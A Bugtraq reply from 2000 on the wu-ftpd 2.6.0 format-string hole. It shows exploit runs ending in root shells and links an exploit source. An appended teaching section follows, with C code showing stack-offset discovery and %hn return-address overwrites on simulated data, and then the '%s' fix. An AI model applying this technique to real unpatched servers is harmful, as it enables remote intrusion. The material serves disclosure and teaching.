[15614] in bugtraq


Re: WuFTPD: Providing *remote* root since at least 1994

daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Sun Jul 2 17:12:05 2000

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id:  <015201bfe36e$c999c9b0$0273b6d4@own3d>
Date:         Sat, 1 Jul 2000 17:12:35 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
X-To:         eric.hines@nuasis.com
To: BUGTRAQ@SECURITYFOCUS.COM

> Has anyone come out with a working version of this exploit script? Both
> versions provided on the securityfocus.com web site, and/or the one
> distributed here by TF8, are not working, even after I fixed his code. Do we
> know for sure the thing even exists? I dunno, can anyone direct me to the
> actual code, because I have yet to see a working version of it that doesn't
> core dump.

Sure? Both tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c) work
on my RedHat and BSD boxes:

lubi:venglin:~> ./b -t 4 pedagog
Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM

Connected to pedagog. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
at offset 1080
at offset 1088
at offset 1096
RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100
Reply size: 289, New RET: 0x80758bf
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
0000000000000000000000000000000
Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
/
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

Another example:

lubi:venglin:~> ./b localhost
Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports

Connected to localhost. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076
Reply size: 527, New RET: 0x80b1d01
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
00000000000000000000000000000000000000000000000000000000000000
FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar  1 11:18:54
CET 2000     venglin@lubi.xxx.xxx.xx:/mnt/elite/usr/src/sys/compile/GADACZKA
i386
/
uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator)

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
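The two logs above show the shape of a classic format-string exploit: the tool first walks the stack one conversion at a time until it sees data it planted ("trying to find offset ... at offset 1096"), then uses %n-style writes to replace the saved return address ("RET ... New RET"), with the number of characters the server has already emitted in the reply factored in (presumably why the tool prints "Reply size" next to the new RET). The C below is an added illustration of those two mechanics; it is not bobek.c, not tf8's code, and not wu-ftpd source. The stack words are a constructed array passed explicitly (a real bug reads whatever lies above the vulnerable frame, which is undefined behaviour and not reproducible in a test), the target slot is a local union standing in for the saved RET, and a little-endian 32-bit layout is assumed as on the x86 targets in the logs. The underlying bug class is a printf-style reply helper handed attacker text as its format; the fix for that class is to pass the text as an argument to a constant "%s" format instead.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Constructed stand-in for the words an attacker would read off the server's
   stack with a run of %08x conversions. In a real format-string bug these are
   whatever lies above the vulnerable call frame; here they are passed as
   explicit arguments so the walk is deterministic and well defined. */
static const uint32_t fake_stack[8] = {
    0x00000000, 0x0804c2a0, 0xbfffd110, 0x0000000c,
    0x41414141,             /* "AAAA": the marker planted in the command text */
    0x0804a7f0, 0xbfffd13c, 0x0000ffff
};
#define MARKER 0x41414141u

/* Step 1, the "trying to find offset" loop: emit k "%08x" conversions and check
   whether the last one printed our marker. Returns the number of conversions
   needed to reach the marker, or -1 if it is not within reach. */
int find_marker_offset(uint32_t marker)
{
    char fmt[8 * 4 + 1];   /* up to eight "%08x" */
    char out[8 * 8 + 1];   /* eight hex words of eight chars each */
    char want[9];
    snprintf(want, sizeof want, "%08x", marker);
    for (int k = 1; k <= 8; k++) {
        fmt[0] = '\0';
        for (int i = 0; i < k; i++) strcat(fmt, "%08x");
        snprintf(out, sizeof out, fmt,
                 fake_stack[0], fake_stack[1], fake_stack[2], fake_stack[3],
                 fake_stack[4], fake_stack[5], fake_stack[6], fake_stack[7]);
        if (strcmp(out + strlen(out) - 8, want) == 0) return k;
    }
    return -1;
}

/* The 32-bit slot being overwritten (stand-in for the saved return address),
   viewed as two 16-bit halves so %hn can write each half separately. */
union slot { uint32_t word; uint16_t half[2]; };

/* Width for a %0*d that moves the running character count from `count` to
   `want` modulo 2^16. %0*d of the value 0 prints max(width, 1) characters, so a
   zero delta has to be a full 65536-character lap rather than a width of 0. */
static int pad_to(unsigned count, unsigned want)
{
    unsigned w = (want - count) & 0xffff;
    return w == 0 ? 0x10000 : (int)w;
}

/* Step 2: overwrite a 32-bit slot with two 16-bit %hn writes. `already` is the
   number of characters the reply has emitted before the directives are reached;
   it is reproduced here with a "%*s" of spaces so the %hn counts include it.
   Little-endian layout assumed: half[0] is the low half. Returns the total
   number of characters the format produced, or -1 on allocation failure. */
int write_word_via_hn(union slot *target, uint32_t value, unsigned already)
{
    unsigned lo = value & 0xffff, hi = value >> 16;
    int w1 = pad_to(already, lo);            /* reach low half first */
    int w2 = pad_to(already + w1, hi);       /* then wrap around to the high half */
    size_t need = (size_t)already + (size_t)w1 + (size_t)w2 + 1;
    char *buf = malloc(need);
    if (!buf) return -1;
    int n = snprintf(buf, need, "%*s%0*d%hn%0*d%hn",
                     (int)already, "",
                     w1, 0, (short *)&target->half[0],
                     w2, 0, (short *)&target->half[1]);
    free(buf);
    return n;
}

/* Convenience wrapper: start from `old`, perform the write, return the result. */
uint32_t demo_write(uint32_t old, uint32_t value, unsigned already)
{
    union slot s = { .word = old };
    if (write_word_via_hn(&s, value, already) < 0) return old;
    return s.word;
}

int main(void)
{
    union slot ret = { .word = 0x080759e0u };   /* "RET" from the first log */
    printf("marker reached after %d conversions\n", find_marker_offset(MARKER));
    int n = write_word_via_hn(&ret, 0x080758bfu, 289); /* "New RET", "Reply size" */
    printf("emitted %d chars, slot now 0x%08x\n", n, ret.word);
    return ret.word == 0x080758bfu ? 0 : 1;
}
```

The two widths are what a tool has to compute from the reply prefix length and the desired address; the second write deliberately wraps the 16-bit counter, which is why the total output runs to tens of kilobytes and why the exploit log warns you to wait for the reply. Replacing `snprintf(buf, n, cmd)` with `snprintf(buf, n, "%s", cmd)` in the reply path makes both steps impossible, because the attacker's text is then never parsed for directives.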
